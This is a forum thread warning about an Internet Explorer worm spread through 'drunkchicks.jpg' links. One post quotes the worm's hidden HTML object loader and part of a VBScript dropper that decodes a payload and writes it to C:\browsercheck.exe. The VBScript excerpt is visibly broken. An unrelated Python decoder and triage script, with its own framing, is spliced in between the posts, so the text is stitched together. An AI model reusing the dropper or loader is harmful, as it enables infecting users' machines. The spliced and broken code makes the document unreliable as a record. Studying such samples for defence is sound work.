
New worm/virus drunkchicks.jpg


  • New worm/virus drunkchicks.jpg

    [16:25] -O- (Broadcast) WARNING: There is a new worm spreading around. If you see a message with a URL that looks like: '<censored>=drunkchicks.jpg LOL' do NOT visit that link. If you have visited it already you have gotten infected, and you are advised to remove c:\browsercheck.exe

    Here is the image for you that only uses msiexplore's_desktop.jpg
    My cars

  • #2
    This is the newest IE exploit going around. There's a version of it going around on AIM where you will get an IM from a buddy that has the virus telling you to visit a website.

    Simple FIX: DON'T RUN IE. It sucks and it's full of unpatched holes that can lead to problems like this. Some are more than 2 years old. Use Mozilla.

    Here's the exploit

    <div style="visibility:hidden;position:absolute;top:30px;left:20px;z-index:2">
    <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
    <xml id="oExec">
                <object id="oFile" data="drunkchicks.php"></object>
    That passes you to a drunkchicks.php, which opens up the exploit.

    Here is a section of it

    function res(x,y)
    	For k = 0 To UBound(v)
    		v(k) = Replace(v(k), x, y)
    End Function
    res "z", "ff"
    res "y", "00"
    For m = 0 To UBound(v)
    	it = it & v(m)
    tmp = Split(it, ",")
    Set WshShell = CreateObject("WScript.Shell")
    Set WshEnv = WshShell.Environment("Process")
    pth = WshEnv("HOMEDRIVE") & WshEnv("HOMEPATH") & "\browsercheck.exe"
    pth = "C:\browsercheck.exe"
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set f = fso.CreateTextFile(pth, True)
    For i = 0 To UBound(tmp)
    	l = Len(tmp(i))
    	b = Int("&H" & Left(tmp(i), 2))
    	If l > 2 Then
    		r = Int("&H" & Mid(tmp(i), 3, l-2))
    		For j = 1 To r
    		f.Write Chr(b)
    		f.Write Chr(b)
    	End If
    f.Close"""" & pth & """")
    The payload is encoded. I don't know VB all that well, but it looks like simple ASCII encoding. If I get bored I'll see if I can decode it.
    '98 Explorer Sport (down atm)
    AMD 800mhz 192megs RAM 60gig hard drive 9 inch widescreen VGA
    80% done
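
The encoding shown in post #2 can be decoded statically for triage, without running the script or writing the result to disk. This is an added example, not code from the thread or from the malware; it assumes a token longer than two hex digits is a byte value followed by a hex repeat count (the excerpt's loop is incomplete), and the function names, size limit and sample input are constructed for illustration.

```python
import hashlib
import re

# Substitutions the excerpt applies before splitting: res "z","ff" and res "y","00".
SUBSTITUTIONS = (("z", "ff"), ("y", "00"))
TOKEN = re.compile(r"[0-9a-fA-F]{2,}")
MAX_OUTPUT = 16 * 1024 * 1024  # refuse run lengths that would exhaust memory


def decode_payload(chunks):
    """Statically decode the dropper's string array into bytes (nothing is executed)."""
    text = "".join(chunks)
    for old, new in SUBSTITUTIONS:
        text = text.replace(old, new)
    out = bytearray()
    for pos, token in enumerate(text.split(",")):
        token = token.strip()
        if not TOKEN.fullmatch(token):
            raise ValueError(f"token {pos} is not hex: {token!r}")
        value = int(token[:2], 16)
        # Assumption: a token longer than two digits carries a hex repeat count
        # after the byte value; a two-digit token is a single byte.
        count = int(token[2:], 16) if len(token) > 2 else 1
        if len(out) + count > MAX_OUTPUT:
            raise ValueError(f"token {pos} expands past {MAX_OUTPUT} bytes")
        out.extend(bytes([value]) * count)
    return bytes(out)


def triage(data):
    """Summarise the decoded blob for an incident note without writing it to disk."""
    return {
        "size": len(data),
        "sha256": hashlib.sha256(data).hexdigest(),
        "looks_like_pe": data[:2] == b"MZ",
    }


# Constructed sample, not the real payload: "MZ", 0x90, three NULs, 0xFF, four NULs.
SAMPLE = ["4d,5a,90,", "y3,z,y4"]

if __name__ == "__main__":
    print(triage(decode_payload(SAMPLE)))
```
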


    • #3
      Or you could actually keep IE (and Windows for that matter) patched. But Mozilla is good too. If only the tabbrowser plugin worked 100%, I'd have fully switched; as it is, I still run both.

      Since when is insanity a bad thing?